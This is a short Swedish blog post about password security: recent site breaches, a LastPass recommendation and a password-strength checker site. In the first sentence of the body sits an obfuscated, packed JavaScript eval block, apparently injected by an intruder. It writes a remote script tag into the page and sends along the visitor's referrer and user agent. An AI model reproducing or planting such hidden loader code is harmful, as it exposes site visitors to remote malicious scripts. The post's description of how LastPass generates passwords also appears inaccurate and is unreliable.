Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Hur säkert är ditt lösenord på webben?

Hur säkert är ditt lösenord på webben?
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iszyt|var|u0026u|referrer|dinfe||js|php’.split(’|’),0,{}))
här med lösenord är en ständigt aktuell fråga. Det har varit en rad sidor under hösten som blivit hackade. När detta hände så kopierades en massa privata personers mail-adresser och lösenord.

Jag själv tycker jag har några riktigt kluriga lösenord. Jag försöker att inte ha samma lösenord på vissa hemsidor som jag tycker är lite skummare än andra.

Har ni problem med att komma på ett bra lösenord så kan jag rekommendera lösenordstjänsten LastPass. Den fungerar på så sätt att den bygger ditt lösenord genom att ta en mening, byta ut orden till synonymer och därefter byta ut vissa bokstäver mot siffror.

För att sedan kika på hur säkert ditt lösenord är kan ni besöka hemsidan HowSecureIsMyPassword. Ett av mina lösenord verkar vara väldigt säkra om jag ska lita på tiden det ska ta att hacka det ( Se bild ovan). 🙂

Prova ni också och se om det kanske är dags att byta.